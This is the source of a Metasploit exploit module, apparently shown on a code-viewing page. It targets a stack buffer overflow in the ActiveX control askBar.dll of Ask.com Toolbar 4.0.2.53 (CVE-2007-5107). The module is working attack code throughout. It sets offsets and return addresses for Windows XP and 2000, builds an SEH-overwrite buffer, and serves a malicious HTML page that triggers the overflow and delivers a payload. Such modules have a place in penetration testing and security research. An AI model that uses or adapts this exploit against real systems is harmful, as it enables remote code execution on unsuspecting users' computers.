Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow',
15
      'Description'    => %q{
16
          This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53.
17
        An attacker may be able to execute arbitrary code by sending an overly
18
        long string to the "ShortFormat()" method in askbar.dll.
19
      },
20
      'License'        => MSF_LICENSE,
21
      'Author'         => [ 'MC' ],
22
      'References'     =>
23
        [
24
          [ 'CVE', '2007-5107' ],
25
          [ 'OSVDB', '37735' ]
26
        ],
27
      'DefaultOptions' =>
28
        {
29
          'EXITFUNC' => 'process',
30
        },
31
      'Payload'        =>
32
        {
33
          'Space'         => 800,
34
          'BadChars'      => "\x00\x09\x0a\x0d'\\",
35
          'StackAdjustment' => -3500,
36
        },
37
      'Platform'       => 'win',
38
      'Targets'        =>
39
        [
40
          [ 'Windows XP SP0/SP1 Pro English',     { 'Offset' => 2876, 'Ret' => 0x71aa32ad } ],
41
          [ 'Windows 2000 Pro English ALL',       { 'Offset' => 1716, 'Ret' => 0x75022ac4 } ],
42
        ],
43
      'DisclosureDate' => '2007-09-24',
44
      'DefaultTarget'  => 0))
45
  end
46

47
  def autofilter
48
      false
49
  end
50

51
  def check_dependencies
52
      use_zlib
53
  end
54

55
  def on_request_uri(cli, request)
56
    # Re-generate the payload
57
    return if ((p = regenerate_payload(cli)) == nil)
58

59
    # Randomize some things
60
    vname	= rand_text_alpha(rand(100) + 1)
61
    strname	= rand_text_alpha(rand(100) + 1)
62

63
    # Set the exploit buffer
64
    filler = rand_text_alpha(target['Offset'])
65
    seh = generate_seh_payload(target.ret)
66
    sploit = filler + seh + rand_text_alpha(payload.encoded.length)
67

68
    # Build out the message
69
    content = %Q|<html>
70
<object classid='clsid:5A074B2B-F830-49DE-A31B-5BB9D7F6B407' id='#{vname}'></object>
71
<script language='javascript'>
72
#{strname} = new String('#{sploit}');
73
#{vname}.ShortFormat = #{strname}
74
</script>
75
</html>
76
|
77

78
    print_status("Sending #{self.name}")
79

80
    # Transmit the response to the client
81
    send_response_html(cli, content)
82

83
    # Handle the payload
84
    handler(cli)
85
  end
86
end
87

88